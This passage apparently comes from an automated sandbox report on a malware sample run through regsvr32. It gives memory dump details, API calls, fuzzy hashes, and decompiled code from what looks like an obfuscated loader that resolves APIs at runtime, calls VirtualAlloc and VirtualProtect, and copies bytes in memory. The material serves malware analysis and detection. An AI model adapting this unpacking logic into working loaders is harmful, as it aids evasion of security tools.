0x1000e04d
0x1000e04d
0x1000e053
0x00000000
0x00000000
0x1000e059
0x1000e05d
0x1000e061
0x00000000
0x00000000
0x00000000
0x1000e061
0x1000e067
0x1000e06f
0x1000e074
0x1000e077
0x1000e077
0x1000e079
0x1000e07d
0x1000e085
0x00000000
0x00000000
0x1000e089
0x1000e091
0x00000000
0x00000000
0x00000000
0x1000e091

APIs

LoadLibraryA.KERNEL32(.dll), ref: 1000E07D
GetProcAddress.KERNEL32(00000000,8DF08B59), ref: 1000E089

Strings

.dll, xrefs: 1000E079, 1000E07C

Memory Dump Source

Source File: 00000006.00000002.622340870.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.622309634.0000000010000000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: .dll
API String ID: 2574300362-2738580789
Opcode ID: b7447c8816937ad7f9345e32d2240df4bb2b7db976f4be3fc21d842f10db7ef4
Instruction ID: 6da95daea6e89431fe10e6910c52a9851ea62cfcad36df982cd2ab94b172e300
Opcode Fuzzy Hash: b7447c8816937ad7f9345e32d2240df4bb2b7db976f4be3fc21d842f10db7ef4
Instruction Fuzzy Hash: F631E431A002998BEB54CFA9C8847AEBBF5EF44384F24446DD905E7349D770ED81C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00192C41, Relevance: 5.1, APIs: 3, Instructions: 582
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000006.00000002.618572860.0000000000190000.00000040.00000001.sdmp, Offset: 00190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_190000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55a69c6a80807367d2ee6713c95060d97be892416f160e53a89ffe9f7bcefe76
Instruction ID: f8ab75d52a69b329a44d82504609a59d5b49dd538a973494d856eb557a218d60
Opcode Fuzzy Hash: 55a69c6a80807367d2ee6713c95060d97be892416f160e53a89ffe9f7bcefe76
Instruction Fuzzy Hash: 10425B72D00609DFEF04CFA0C9897AA7BB5FF64311F18546ADD0DAE149C77815A4CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00193073, Relevance: 4.8, APIs: 3, Instructions: 306
comlibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(00192C25,00192C25,458F0000,?,00000000), ref: 001931F1
OleUninitialize.OLE32(00192C25), ref: 00193354

Memory Dump Source

Source File: 00000006.00000002.618572860.0000000000190000.00000040.00000001.sdmp, Offset: 00190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_190000_regsvr32.jbxd

Similarity

API ID: LibraryLoadUninitialize
String ID:
API String ID: 2978721001-0
Opcode ID: 63462bf202cfa106886da0fd231bacab201c4396b8d2cbd2302e506409071efd
Instruction ID: 1697d18d80ef6043c18960079b27b0b3ab06fb3af575f4bc99e482d315fa9304
Opcode Fuzzy Hash: 63462bf202cfa106886da0fd231bacab201c4396b8d2cbd2302e506409071efd
Instruction Fuzzy Hash: 0BD16A72C00615DFEF04CFA0C9897AABBB5FF64311F09546ADD49AF149C73816A4CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00191424, Relevance: 3.3, APIs: 2, Instructions: 272
memoryCOMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 50%

			E00191424(signed int __ebx, void* __ecx, signed int __edx, signed int __edi, signed int __esi, void* __eflags) {
				void* _t154;
				int _t155;
				signed int _t158;
				int _t159;
				signed int _t160;
				intOrPtr _t163;
				signed int _t164;
				signed int _t166;
				signed int _t169;
				signed int _t171;
				intOrPtr _t175;
				signed int _t176;
				intOrPtr _t177;
				signed int _t179;
				signed int _t182;
				signed int _t183;
				signed int _t185;
				signed int _t188;
				signed int _t189;
				signed int _t190;
				void* _t192;
				signed int _t193;
				signed int _t194;
				signed int _t212;
				signed int _t215;
				signed int _t224;
				signed int _t225;
				void* _t226;
				void* _t227;
				signed int _t234;
				signed int _t237;
				void* _t244;
				signed int* _t246;

				_t234 = __esi;
				_t224 = __edi;
				_t212 = __edx;
				_t155 = E0019463B(_t154, __ebx, __ecx, __edi);
				_push(__ecx);
				_t188 = __ebx | __ebx;
				_t185 = _t188;
				_pop(_t189);
				if(_t188 != 0) {
					if( *(_t185 + 0x4358a4) == 0) {
						_t183 =  *((intOrPtr*)(_t185 + 0x4410a0))(0, 1,  *((intOrPtr*)(_t185 + 0x435888)), 0xf,  *((intOrPtr*)(_t185 + 0x4353a6)), 0x1c4, 0x800);
						 *_t246 = _t189;
						 *(_t185 + 0x4358a4) = 0 ^ _t183;
						_t189 = 0;
					}
					_push(4);
					_push(0x1000);
					_push( *((intOrPtr*)(_t185 + 0x435280)));
					_push(0);
					if( *(_t185 + 0x435585) == 0) {
						_t182 =  *((intOrPtr*)(_t185 + 0x441064))(_t185 + 0x43546a);
						 *(_t244 - 8) = _t212;
						 *(_t185 + 0x435585) =  *(_t185 + 0x435585) & 0x00000000;
						 *(_t185 + 0x435585) =  *(_t185 + 0x435585) ^ (_t212 & 0x00000000 | _t182);
						_t212 =  *(_t244 - 8);
					}
					_t155 = VirtualAlloc();
				}
				 *_t17 = _t155;
				 *((intOrPtr*)(_t185 + 0x4354d2)) = 2;
				if( *(_t185 + 0x435014) == 0) {
					_t179 =  *((intOrPtr*)(_t185 + 0x441054))(_t185 + 0x435702, _t155);
					 *(_t244 - 4) = _t224;
					 *(_t185 + 0x435014) = 0 ^ _t179;
					_t224 =  *(_t244 - 4);
					_t155 = (_t179 & 0x00000000) +  *_t246;
					_t246 =  &(_t246[1]);
				}
				 *(_t185 + 0x4350dc) =  *(_t185 + 0x4350dc) & 0x00000000;
				 *(_t185 + 0x4350dc) =  *(_t185 + 0x4350dc) ^ _t234 & 0x00000000 ^ _t155;
				_t237 = _t234;
				if( *(_t185 + 0x4350b0) > 0) {
					if( *((intOrPtr*)(_t185 + 0x43590c)) == 0) {
						_t177 =  *((intOrPtr*)(_t185 + 0x4410a0))(0, 1,  *((intOrPtr*)(_t185 + 0x4351af)),  *((intOrPtr*)(_t185 + 0x435422)), 0x1d7, 0xf8,  *((intOrPtr*)(_t185 + 0x43539e)));
						 *(_t244 - 8) = _t237;
						 *((intOrPtr*)(_t185 + 0x43590c)) = _t177;
						_t237 =  *(_t244 - 8);
					}
					_push(_t185 + 0x4354d2);
					_push(0x40);
					if( *(_t185 + 0x435968) == 0) {
						_t176 =  *((intOrPtr*)(_t185 + 0x441058))();
						 *(_t185 + 0x435968) =  *(_t185 + 0x435968) & 0x00000000;
						 *(_t185 + 0x435968) =  *(_t185 + 0x435968) | _t189 -  *_t246 | _t176;
						_t189 = _t189;
					}
					_t175 =  *((intOrPtr*)(_t185 + 0x441044))(_t185 + 0x43501c, _t185 + 0x4354ea,  *(_t185 + 0x435462));
					 *_t246 = _t189;
					 *((intOrPtr*)(_t185 + 0x4359f1)) = _t175;
					_t189 = 0;
					_t155 = VirtualProtect( *(_t185 + 0x4350b0), ??, ??, ??);
				}
				if(_t155 != _t185) {
					if( *(_t185 + 0x435366) == 0) {
						_t171 =  *((intOrPtr*)(_t185 + 0x441068))(_t185 + 0x4357ae);
						 *(_t185 + 0x435366) =  *(_t185 + 0x435366) & 0x00000000;
						 *(_t185 + 0x435366) =  *(_t185 + 0x435366) ^ _t224 & 0x00000000 ^ _t171;
						_t224 = _t224;
					}
					_push( *((intOrPtr*)(_t185 + 0x43574e)));
					_push( *((intOrPtr*)(_t185 + 0x435288)));
					if( *(_t185 + 0x435248) == 0) {
						_t169 =  *((intOrPtr*)(_t185 + 0x441064))(_t185 + 0x4358c8);
						 *(_t244 - 8) = _t212;
						 *(_t185 + 0x435248) =  *(_t185 + 0x435248) & 0x00000000;
						 *(_t185 + 0x435248) =  *(_t185 + 0x435248) ^ (_t212 ^  *(_t244 - 8) | _t169);
						_t212 =  *(_t244 - 8);
					}
					_t155 = E00193726(_t185, _t189, _t212, _t224, _t237); // executed
				}
				 *(_t244 - 4) = _t212;
				_t190 = 0 ^  *(_t185 + 0x435462);
				_t215 =  *(_t244 - 4);
				 *(_t244 - 8) = _t155;
				_t225 = 0 ^  *(_t185 + 0x4350b0);
				_t158 =  *(_t244 - 8);
				if( *((intOrPtr*)(_t185 + 0x4357a2)) == 0) {
					_t158 =  *((intOrPtr*)(_t185 + 0x441060))();
					 *_t79 = _t158;
					_push( *(_t244 - 8));
					_pop( *_t81);
					 *_t82 = _t190;
					_t190 = (_t190 & 0x00000000) +  *(_t244 - 4);
				}
				_t192 = _t225 | _t225;
				_t226 = _t192;
				_t193 = _t190;
				if(_t192 != 0) {
					if( *(_t185 + 0x435520) == 0) {
						_t158 =  *((intOrPtr*)(_t185 + 0x4410a0))( *((intOrPtr*)(_t185 + 0x435681)),  *((intOrPtr*)(_t185 + 0x4353d2)),  *((intOrPtr*)(_t185 + 0x4354ba)),  *((intOrPtr*)(_t185 + 0x435796)),  *((intOrPtr*)(_t185 + 0x4354a2)), 0xdf, 0x400, _t193);
						 *(_t244 - 8) = _t193;
						 *(_t185 + 0x435520) =  *(_t185 + 0x435520) & 0x00000000;
						 *(_t185 + 0x435520) =  *(_t185 + 0x435520) | _t193 & 0x00000000 ^ _t158;
						_t193 =  *_t246;
						_t246 =  &(_t246[1]);
					}
					_push(_t226);
					if( *(_t185 + 0x4353c6) == 0) {
						_t158 =  *((intOrPtr*)(_t185 + 0x44105c))(_t193);
						 *(_t185 + 0x4353c6) =  *(_t185 + 0x4353c6) & 0x00000000;
						 *(_t185 + 0x4353c6) =  *(_t185 + 0x4353c6) ^ _t237 & 0x00000000 ^ _t158;
						_t237 = _t237;
						_t193 = (_t193 & 0x00000000) +  *_t246;
						_t246 = _t246 - 0xfffffffc;
					}
					_t158 = E00194495(_t158, _t185, _t193, _t215, _t226, _t237);
				}
				 *_t246 =  *_t246 ^ _t158;
				_t159 = _t158;
				if( *(_t185 + 0x435855) == 0) {
					_t166 =  *((intOrPtr*)(_t185 + 0x4410a4))( *((intOrPtr*)(_t185 + 0x435615)), _t159);
					 *(_t244 - 8) = _t226;
					 *(_t185 + 0x435855) =  *(_t185 + 0x435855) & 0x00000000;
					 *(_t185 + 0x435855) =  *(_t185 + 0x435855) ^ (_t226 -  *(_t244 - 8) | _t166);
					_t226 =  *(_t244 - 8);
					_pop( *_t113);
					_t193 =  *(_t244 - 8);
					 *_t115 = _t193;
					_t159 = _t166 & 0x00000000 ^  *(_t244 - 4);
				}
				_t160 = memset(_t226, _t159, _t193 << 0);
				_t227 = _t226 + _t193;
				_t194 = 0;
				if( *(_t185 + 0x4353ce) == 0) {
					_t160 =  *((intOrPtr*)(_t185 + 0x441068))(_t185 + 0x4359ac);
					 *(_t244 - 4) = _t215;
					 *(_t185 + 0x4353ce) =  *(_t185 + 0x4353ce) & 0x00000000;
					 *(_t185 + 0x4353ce) =  *(_t185 + 0x4353ce) | _t215 -  *(_t244 - 4) | _t160;
					_t215 =  *(_t244 - 4);
				}
				if( *((intOrPtr*)(_t185 + 0x43574e)) != _t185) {
					if( *(_t185 + 0x4357d6) == 0) {
						_t164 =  *((intOrPtr*)(_t185 + 0x441058))();
						 *(_t244 - 8) = _t237;
						 *(_t185 + 0x4357d6) = 0 ^ _t164;
						_t237 =  *(_t244 - 8);
					}
					_push( *((intOrPtr*)(_t185 + 0x43574e)));
					if( *((intOrPtr*)(_t185 + 0x435177)) == 0) {
						_t163 =  *((intOrPtr*)(_t185 + 0x441064))(_t185 + 0x4351ff);
						 *(_t244 - 8) = _t194;
						 *((intOrPtr*)(_t185 + 0x435177)) = _t163;
						_t194 =  *(_t244 - 8);
					}
					_t161 = E0019242A(_t185, _t194, _t215, _t227, _t237); // executed
					if( *((intOrPtr*)(_t185 + 0x43536a)) == 0) {
						 *_t144 =  *((intOrPtr*)(_t185 + 0x4410a8))(0,  *((intOrPtr*)(_t185 + 0x43549e)));
						 *_t146 =  *(_t244 - 4);
					}
					_t160 = E00193658(_t161, _t185, _t215, _t227, _t237,  *((intOrPtr*)(_t185 + 0x43574e)));
				}
				 *(_t244 - 8) = _t194;
				 *_t151 = _t215 & 0x00000000 ^ (_t194 & 0x00000000 |  *(_t185 + 0x4351a7));
				 *_t153 =  *(_t244 - 4);
				asm("popad");
				return _t160;
			}

0x00191424
0x00191424
0x00191424
0x00191424
0x00191429
0x0019142c
0x0019142e
0x00191430
0x00191431
0x0019143a
0x00191458
0x00191460
0x00191467
0x0019146d
0x0019146d
0x0019146e
0x00191470
0x00191475
0x0019147b
0x00191484
0x0019148d
0x00191493
0x0019149b
0x001914a2
0x001914a8
0x001914a8
0x001914ab
0x001914ab
0x001914b2
0x001914b8
0x001914c9
0x001914d3
0x001914d9
0x001914e0
0x001914e6
0x001914ef
0x001914f2
0x001914f2
0x001914fb
0x00191502
0x00191508
0x00191510
0x0019151d
0x0019153f
0x00191545
0x0019154c
0x00191552
0x00191552
0x0019155b
0x0019155c
0x00191565
0x00191567
0x00191573
0x0019157a
0x00191580
0x00191580
0x00191595
0x0019159d
0x001915a4
0x001915aa
0x001915b1
0x001915b1
0x001915b9
0x001915c2
0x001915cb
0x001915d7
0x001915de
0x001915e4
0x001915e4
0x001915e5
0x001915eb
0x001915f8
0x00191601
0x00191607
0x0019160f
0x00191616
0x0019161c
0x0019161c
0x0019161f
0x0019161f
0x00191624
0x0019162f
0x00191631
0x00191634
0x0019163f
0x00191641
0x0019164b
0x0019164e
0x00191655
0x00191658
0x0019165b
0x00191667
0x0019166a
0x0019166a
0x00191670
0x00191672
0x00191674
0x00191675
0x00191682
0x001916ad
0x001916b3
0x001916bb
0x001916c2
0x001916cd
0x001916d0
0x001916d0
0x001916d3
0x001916db
0x001916de
0x001916ea
0x001916f1
0x001916f7
0x001916fe
0x00191701
0x00191701
0x00191704
0x00191704
0x0019170a
0x0019170d
0x00191715
0x0019171f
0x00191725
0x0019172d
0x00191734
0x0019173a
0x0019173d
0x00191740
0x00191749
0x0019174c
0x0019174c
0x0019174f
0x0019174f
0x0019174f
0x00191758
0x00191761
0x00191767
0x0019176f
0x00191776
0x0019177c
0x0019177c
0x00191785
0x0019178e
0x00191790
0x00191796
0x0019179d
0x001917a3
0x001917a3
0x001917a6
0x001917b3
0x001917bc
0x001917c2
0x001917c9
0x001917cf
0x001917cf
0x001917d2
0x001917de
0x001917ef
0x001917f5
0x001917f5
0x00191801
0x00191801
0x00191806
0x0019181b
0x00191821
0x00191824
0x00191826

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 001914AB
VirtualProtect.KERNEL32(?), ref: 001915B1

Memory Dump Source

Source File: 00000006.00000002.618572860.0000000000190000.00000040.00000001.sdmp, Offset: 00190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_190000_regsvr32.jbxd

Similarity

API ID: Virtual$AllocProtect
String ID:
API String ID: 2447062925-0
Opcode ID: 22e667abeca61440a8b0fec79a75a9c4ed0bf930217f70a32a92829f77582f46
Instruction ID: 45e2602dace533f8fee477fd2ade58a9355cc41a58158dc6f6f6cf48857a3d95
Opcode Fuzzy Hash: 22e667abeca61440a8b0fec79a75a9c4ed0bf930217f70a32a92829f77582f46
Instruction Fuzzy Hash: 91C14E72904604EFFF18CFA0C889B997BB1FF64311F1860A9ED0D9E19AD77415A4CB28

Uniqueness

Uniqueness Score: -1.00%

Function 001932EB, Relevance: 3.2, APIs: 2, Instructions: 151
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OleUninitialize.OLE32(00192C25), ref: 00193354
OleInitialize.OLE32(00000000,00000000), ref: 0019349A

Memory Dump Source

Source File: 00000006.00000002.618572860.0000000000190000.00000040.00000001.sdmp, Offset: 00190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_190000_regsvr32.jbxd

Similarity

API ID: InitializeUninitialize
String ID:
API String ID: 3442037557-0
Opcode ID: b3e2ec72f7409a1985b0da953e772d2d78d9d955f9ccdd8e3959b9227137adb3
Instruction ID: d39962fea42d0c23e39fbdfc9bae482fb56329767f8883d3c7ccf3764c87281f
Opcode Fuzzy Hash: b3e2ec72f7409a1985b0da953e772d2d78d9d955f9ccdd8e3959b9227137adb3
Instruction Fuzzy Hash: 97518A72D04619DFEF14CFA4C8897AABBB1FF14311F09916ADD49AB189C7340690CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00193726, Relevance: 2.2, APIs: 1, Instructions: 735
comCOMMONCrypto

Download Yara Rule

C-Code - Quality: 78%

			E00193726(void* __ebx, signed int __ecx, void* __edx, signed int __edi, void* __esi, intOrPtr _a4, signed int _a8) {
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _t416;
				signed int _t417;
				signed int _t421;
				void* _t425;
				signed int _t427;
				signed int _t429;
				signed int _t434;
				signed int _t436;
				signed int _t438;
				signed int _t440;
				signed int _t441;
				signed int _t443;
				signed int _t446;
				signed int _t450;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t457;
				signed int _t459;
				signed int _t461;
				signed int _t462;
				signed int _t465;
				signed int _t466;
				signed int _t468;
				signed int _t469;
				signed int _t471;
				signed int _t473;
				signed int _t476;
				signed int _t477;
				signed int _t478;
				signed int _t480;
				signed int _t481;
				signed int _t486;
				signed int _t489;
				void* _t493;
				void* _t495;
				signed int _t497;
				signed int _t500;
				void* _t503;
				signed int _t504;
				signed int _t507;
				signed int _t509;
				signed int _t512;
				signed int _t514;
				signed int _t515;
				signed int _t520;
				signed int _t525;
				int _t527;
				int _t531;
				void* _t567;
				signed int _t568;
				signed int _t570;
				signed int _t584;
				signed int _t585;
				signed int _t587;
				void* _t590;
				void* _t592;
				void* _t625;
				intOrPtr* _t626;
				signed int _t627;
				void* _t629;
				signed int _t634;
				signed int _t637;
				signed int _t639;
				void* _t640;
				void* _t641;
				signed int _t657;
				signed int _t660;
				signed int* _t672;
				signed int* _t673;
				signed int* _t676;
				intOrPtr* _t677;
				signed int* _t678;

				_t625 = __esi;
				_t584 = __edi;
				_t567 = __edx;
				_t504 = __ecx;
				_t493 = __ebx;
				if( *((intOrPtr*)(__ebx + 0x435126)) == 0) {
					_push(__ebx + 0x4354be);
					 *_t4 =  *((intOrPtr*)(__ebx + 0x44106c))();
					_push(_v20);
					_pop( *_t6);
				}
				_t416 = _t493 + 0x435323;
				if( *(_t493 + 0x4351eb) == 0) {
					_t489 =  *((intOrPtr*)(_t493 + 0x441064))(_t493 + 0x43521f, _t416);
					 *_t672 = _t657;
					 *(_t493 + 0x4351eb) = 0 ^ _t489;
					_t657 = 0;
					_t416 =  *_t672;
					_t672 = _t672 - 0xfffffffc;
				}
				_push(_t416);
				_t417 = _t493 + 0x43569a;
				if( *(_t493 + 0x4354fd) == 0) {
					_t486 =  *((intOrPtr*)(_t493 + 0x44105c))(_t417);
					_v12 = _t584;
					 *(_t493 + 0x4354fd) =  *(_t493 + 0x4354fd) & 0x00000000;
					 *(_t493 + 0x4354fd) =  *(_t493 + 0x4354fd) | _t584 - _v12 | _t486;
					_t584 = _v12;
					_t417 =  *_t672;
					_t672 = _t672 - 0xfffffffc;
				}
				 *_t23 =  *((intOrPtr*)(_t493 + 0x441044))(_t417);
				_push(_v16);
				_pop( *_t25);
				if( *((intOrPtr*)(_t493 + 0x43599c)) == 0) {
					 *_t29 =  *((intOrPtr*)(_t493 + 0x4410a4))( *((intOrPtr*)(_t493 + 0x4357a6)));
					_push(_v12);
					_pop( *_t31);
				}
				_push(_t625);
				if( *((intOrPtr*)(_t493 + 0x435611)) == 0) {
					_t481 = _t493 + 0x4353d6;
					if( *((intOrPtr*)(_t493 + 0x4356e9)) == 0) {
						 *_t37 =  *((intOrPtr*)(_t493 + 0x441070))( *((intOrPtr*)(_t493 + 0x43584d)), _t481);
						_push(_v20);
						_pop( *_t39);
						_t481 =  *_t672;
						_t672 = _t672 - 0xfffffffc;
					}
					 *_t41 =  *((intOrPtr*)(_t493 + 0x441054))(_t481);
					_push(_v12);
					_pop( *_t43);
				}
				_push(_t584);
				if( *(_t493 + 0x4356f5) == 0) {
					_t480 =  *((intOrPtr*)(_t493 + 0x4410a8))( *((intOrPtr*)(_t493 + 0x43594c)),  *((intOrPtr*)(_t493 + 0x435112)));
					 *(_t493 + 0x4356f5) =  *(_t493 + 0x4356f5) & 0x00000000;
					 *(_t493 + 0x4356f5) =  *(_t493 + 0x4356f5) ^ _t504 & 0x00000000 ^ _t480;
					_t504 = _t504;
				}
				_push(_a4);
				_pop( *_t53);
				_push(_v12);
				_pop(_t626);
				if( *(_t493 + 0x4358dc) == 0) {
					_t476 =  *((intOrPtr*)(_t493 + 0x441044))(_t493 + 0x43592c, _t493 + 0x435509);
					_v16 = _t584;
					 *(_t493 + 0x4353ca) =  *(_t493 + 0x4353ca) & 0x00000000;
					 *(_t493 + 0x4353ca) =  *(_t493 + 0x4353ca) ^ _t584 ^ _v16 ^ _t476;
					_t477 =  *((intOrPtr*)(_t493 + 0x441060))();
					if( *(_t493 + 0x435268) == 0) {
						_t478 =  *((intOrPtr*)(_t493 + 0x4410a4))( *((intOrPtr*)(_t493 + 0x4354da)), _t477);
						 *(_t493 + 0x435268) =  *(_t493 + 0x435268) & 0x00000000;
						 *(_t493 + 0x435268) =  *(_t493 + 0x435268) | _t567 ^  *_t672 ^ _t478;
						_t567 = _t567;
						_t477 =  *_t672;
						_t672 =  &(_t672[1]);
					}
					 *(_t493 + 0x4358dc) =  *(_t493 + 0x4358dc) & 0x00000000;
					 *(_t493 + 0x4358dc) =  *(_t493 + 0x4358dc) | _t626 -  *_t672 ^ _t477;
					_t626 = _t626;
				}
				_v12 = _t504;
				_t585 = 0 ^ _a8;
				_t507 = _v12;
				if( *(_t493 + 0x435675) == 0) {
					_t473 =  *((intOrPtr*)(_t493 + 0x44106c))(_t493 + 0x435994);
					 *(_t493 + 0x435675) =  *(_t493 + 0x435675) & 0x00000000;
					 *(_t493 + 0x435675) =  *(_t493 + 0x435675) | _t507 & 0x00000000 ^ _t473;
					_t507 = _t507;
				}
				if( *(_t493 + 0x435732) == 0) {
					if( *(_t493 + 0x435142) == 0) {
						_t471 =  *((intOrPtr*)(_t493 + 0x441060))();
						_v16 = _t626;
						 *(_t493 + 0x435142) =  *(_t493 + 0x435142) & 0x00000000;
						 *(_t493 + 0x435142) =  *(_t493 + 0x435142) | _t626 - _v16 | _t471;
						_t626 = _v16;
					}
					_t469 =  *((intOrPtr*)(_t493 + 0x44105c))();
					_v20 = _t507;
					 *(_t493 + 0x435732) =  *(_t493 + 0x435732) & 0x00000000;
					 *(_t493 + 0x435732) =  *(_t493 + 0x435732) ^ _t507 ^ _v20 ^ _t469;
					if( *((intOrPtr*)(_t493 + 0x43545a)) == 0) {
						 *_t113 =  *((intOrPtr*)(_t493 + 0x4410a0))( *((intOrPtr*)(_t493 + 0x4357c2)),  *((intOrPtr*)(_t493 + 0x4350a0)), 0x61,  *((intOrPtr*)(_t493 + 0x43587c)),  *((intOrPtr*)(_t493 + 0x4356ad)),  *((intOrPtr*)(_t493 + 0x435819)), 0x400);
						_push(_v12);
						_pop( *_t115);
					}
				}
				_push( *((intOrPtr*)(_t626 + 8)));
				if( *(_t493 + 0x435898) == 0) {
					_t468 =  *((intOrPtr*)(_t493 + 0x44106c))(_t493 + 0x435290);
					_v12 = _t585;
					 *(_t493 + 0x435898) =  *(_t493 + 0x435898) & 0x00000000;
					 *(_t493 + 0x435898) =  *(_t493 + 0x435898) ^ (_t585 & 0x00000000 | _t468);
					_t585 = _v12;
				}
				_push(_t585);
				if( *(_t493 + 0x4358d8) == 0) {
					_t466 =  *((intOrPtr*)(_t493 + 0x441070))(0);
					 *_t672 = _t567;
					 *(_t493 + 0x4358d8) = 0 ^ _t466;
					_t567 = 0;
				}
				if( *((intOrPtr*)(_t493 + 0x435456)) == 0) {
					if( *(_t493 + 0x4355f9) == 0) {
						_t465 =  *((intOrPtr*)(_t493 + 0x441070))(0);
						 *(_t493 + 0x4355f9) =  *(_t493 + 0x4355f9) & 0x00000000;
						 *(_t493 + 0x4355f9) =  *(_t493 + 0x4355f9) ^ (_t585 & 0x00000000 | _t465);
						_t585 = _t585;
					}
					_t462 =  *((intOrPtr*)(_t493 + 0x4410a4))(1);
					if( *((intOrPtr*)(_t493 + 0x4359a0)) == 0) {
						 *_t143 =  *((intOrPtr*)(_t493 + 0x4410a0))(0, 0,  *((intOrPtr*)(_t493 + 0x435940)), 0x4c,  *((intOrPtr*)(_t493 + 0x435665)),  *((intOrPtr*)(_t493 + 0x435a51)),  *((intOrPtr*)(_t493 + 0x435a15)), _t462);
						_push(_v16);
						_pop( *_t145);
						_t462 =  *_t672;
						_t672 = _t672 - 0xfffffffc;
					}
					 *_t146 = _t462;
					_push(_v16);
					_pop( *_t148);
				}
				 *_t150 =  *((intOrPtr*)(_t493 + 0x435280));
				_push(_v12);
				_t509 =  &_v20;
				_t660 = _t657;
				_push(_t509);
				if( *(_t493 + 0x4359bd) == 0) {
					_t461 =  *((intOrPtr*)(_t493 + 0x44106c))(_t493 + 0x435880, _t509);
					_v20 = _t509;
					 *(_t493 + 0x4359bd) =  *(_t493 + 0x4359bd) & 0x00000000;
					 *(_t493 + 0x4359bd) =  *(_t493 + 0x4359bd) | _t509 - _v20 ^ _t461;
					_t509 = (_v20 & 0x00000000) +  *_t672;
					_t672 = _t672 - 0xfffffffc;
				}
				_t627 = _t626 +  *_t626;
				if( *(_t493 + 0x4357f2) == 0) {
					_push(_t509);
					if( *(_t493 + 0x4355bd) == 0) {
						_t459 =  *((intOrPtr*)(_t493 + 0x44106c))(_t493 + 0x43509c);
						_v16 = _t627;
						 *(_t493 + 0x4355bd) =  *(_t493 + 0x4355bd) & 0x00000000;
						 *(_t493 + 0x4355bd) =  *(_t493 + 0x4355bd) | _t627 & 0x00000000 ^ _t459;
						_t627 = _v16;
					}
					_push( *((intOrPtr*)(_t493 + 0x4350ac)));
					_push(0xc);
					if( *((intOrPtr*)(_t493 + 0x435894)) == 0) {
						_t457 =  *((intOrPtr*)(_t493 + 0x441068))(_t493 + 0x4359a4);
						 *_t672 = _t627;
						 *((intOrPtr*)(_t493 + 0x435894)) = _t457;
						_t627 = 0;
					}
					_push( *((intOrPtr*)(_t493 + 0x435346)));
					if( *(_t493 + 0x435815) == 0) {
						_t455 =  *((intOrPtr*)(_t493 + 0x4410a8))( *((intOrPtr*)(_t493 + 0x435776)), 4);
						 *(_t493 + 0x435815) =  *(_t493 + 0x435815) & 0x00000000;
						 *(_t493 + 0x435815) =  *(_t493 + 0x435815) ^ (_t627 & 0x00000000 | _t455);
						_t627 = _t627;
					}
					_push(0x2e);
					_push( *((intOrPtr*)(_t493 + 0x435a19)));
					if( *(_t493 + 0x435a09) == 0) {
						_t454 =  *((intOrPtr*)(_t493 + 0x4410a8))( *((intOrPtr*)(_t493 + 0x4356f1)),  *((intOrPtr*)(_t493 + 0x43544a)));
						_v12 = _t509;
						 *(_t493 + 0x435a09) =  *(_t493 + 0x435a09) & 0x00000000;
						 *(_t493 + 0x435a09) =  *(_t493 + 0x435a09) | _t509 ^ _v12 ^ _t454;
						_t509 = _v12;
					}
					_t451 =  *((intOrPtr*)(_t493 + 0x4410a0))( *((intOrPtr*)(_t493 + 0x435639)),  *((intOrPtr*)(_t493 + 0x435317)));
					if( *(_t493 + 0x4359dd) == 0) {
						_t453 =  *((intOrPtr*)(_t493 + 0x441054))(_t493 + 0x435432, _t451);
						 *(_t493 + 0x4359dd) =  *(_t493 + 0x4359dd) & 0x00000000;
						 *(_t493 + 0x4359dd) =  *(_t493 + 0x4359dd) ^ (_t509 ^  *_t672 | _t453);
						_t509 = _t509;
						_pop( *_t207);
						_t451 = _v12;
					}
					 *(_t493 + 0x4357f2) =  *(_t493 + 0x4357f2) & 0x00000000;
					 *(_t493 + 0x4357f2) =  *(_t493 + 0x4357f2) | _t660 -  *_t672 | _t451;
					_t660 = _t660;
					_t509 =  *_t672;
					_t672 = _t672 - 0xfffffffc;
				}
				do {
					asm("movsb");
					_t509 = _t509 - 1;
				} while (_t509 != 0);
				_t421 =  *((intOrPtr*)(_t493 + 0x441044))(_t493 + 0x435812, _t493 + 0x4356cd);
				 *(_t493 + 0x43558d) =  *(_t493 + 0x43558d) & 0x00000000;
				 *(_t493 + 0x43558d) =  *(_t493 + 0x43558d) | _t509 & 0x00000000 ^ _t421;
				_t512 = _t509;
				if( *(_t493 + 0x4355d5) == 0) {
					_push(_t493 + 0x435736);
					if( *(_t493 + 0x4352bf) == 0) {
						_t450 =  *((intOrPtr*)(_t493 + 0x44106c))(_t493 + 0x4358fc);
						 *(_t493 + 0x4352bf) =  *(_t493 + 0x4352bf) & 0x00000000;
						 *(_t493 + 0x4352bf) =  *(_t493 + 0x4352bf) ^ (_t585 & 0x00000000 | _t450);
						_t585 = _t585;
					}
					_t421 =  *((intOrPtr*)(_t493 + 0x44106c))();
					_push(_t585);
					 *(_t493 + 0x4355d5) =  *(_t493 + 0x4355d5) & 0x00000000;
					 *(_t493 + 0x4355d5) =  *(_t493 + 0x4355d5) | _t585 -  *_t672 | _t421;
					if( *(_t493 + 0x435264) == 0) {
						_t421 =  *((intOrPtr*)(_t493 + 0x441064))(_t493 + 0x435070);
						_v12 = _t567;
						 *(_t493 + 0x435264) =  *(_t493 + 0x435264) & 0x00000000;
						 *(_t493 + 0x435264) =  *(_t493 + 0x435264) | _t567 & 0x00000000 | _t421;
						_t567 = _v12;
					}
				}
				_pop( *_t243);
